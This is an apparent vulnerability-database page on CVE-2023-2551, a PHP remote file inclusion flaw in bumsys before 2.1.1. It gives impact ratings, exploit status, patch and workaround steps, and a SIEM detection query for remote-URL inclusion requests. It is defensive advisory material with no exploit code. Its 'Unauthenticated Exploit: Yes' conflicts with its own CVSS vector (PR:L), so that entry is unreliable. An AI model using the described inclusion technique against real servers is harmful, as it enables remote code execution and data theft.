Login Sign Up

CVE-2023-2551

8.8 HIGH

📋 TL;DR

This CVE describes a PHP Remote File Inclusion vulnerability in the bumsys software that allows attackers to include and execute arbitrary remote files. Attackers can exploit this to execute malicious code on affected systems. Users running bumsys versions prior to 2.1.1 are affected.

💻 Affected Systems

Products:
  • bumsys
Versions: All versions prior to 2.1.1
Operating Systems: Any OS running PHP
Default Config Vulnerable: ⚠️ Yes
Notes: Requires PHP installation with allow_url_include enabled (often disabled by default in modern PHP versions).

📦 What is this software?

Bumsys by Bumsys Project

View all CVEs affecting Bumsys →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise leading to remote code execution, data theft, and complete control over the affected server.

🟠

Likely Case

Arbitrary code execution leading to web shell installation, data exfiltration, and lateral movement within the network.

🟢

If Mitigated

Limited impact if proper web application firewalls and input validation are in place, potentially blocking malicious requests.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit details are publicly available in the huntr.dev bounty report and GitHub commit.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.1.1

Vendor Advisory: https://github.com/unilogies/bumsys/commit/86e29dd23df348ec6075f0c0de8e06b8d9fb0a9a

Restart Required: No

Instructions:

1. Update bumsys to version 2.1.1 or later. 2. Replace vulnerable files with patched versions from the GitHub commit. 3. Verify the fix by testing file inclusion functionality.

🔧 Temporary Workarounds

Disable allow_url_include

all

Disable PHP's allow_url_include setting to prevent remote file inclusion.

php.ini: allow_url_include = Off

Web Application Firewall Rules

all

Implement WAF rules to block requests containing remote file inclusion patterns.

🧯 If You Can't Patch

  • Implement strict input validation and sanitization for all file inclusion parameters.
  • Deploy network segmentation to isolate the vulnerable system from critical assets.

🔍 How to Verify

Check if Vulnerable:

Check if bumsys version is below 2.1.1 and review code for unsafe file inclusion functions like include(), require() with user input.

Check Version:

Check bumsys documentation or configuration files for version information.

Verify Fix Applied:

Verify the installation is version 2.1.1 or later and test file inclusion functionality with controlled inputs.

📡 Detection & Monitoring

Log Indicators:

  • Unusual file inclusion attempts in web server logs
  • Requests containing remote URLs in file inclusion parameters
  • Multiple failed inclusion attempts from single IPs

Network Indicators:

  • HTTP requests with remote file paths in parameters
  • Outbound connections to unexpected domains following inclusion attempts

SIEM Query:

web_server_logs | where url contains "include" or url contains "require" | where url contains "http://" or url contains "https://"

📊 Metadata

CVE ID: CVE-2023-2551
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-98
Published: May 5, 2023
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-2551, you might also want to check these:

CVE-2025-25174 10.0

This CVE describes a PHP Local File Inclusion vulnerability in the BeeTeam368 Extensions WordPress p...

Same vulnerability type (CWE-98)
CVE-2025-49994 9.8

This vulnerability allows attackers to include local files on the server through improper filename c...

Same vulnerability type (CWE-98)
CVE-2025-50003 9.8

This vulnerability allows attackers to include local PHP files through improper filename control in ...

Same vulnerability type (CWE-98)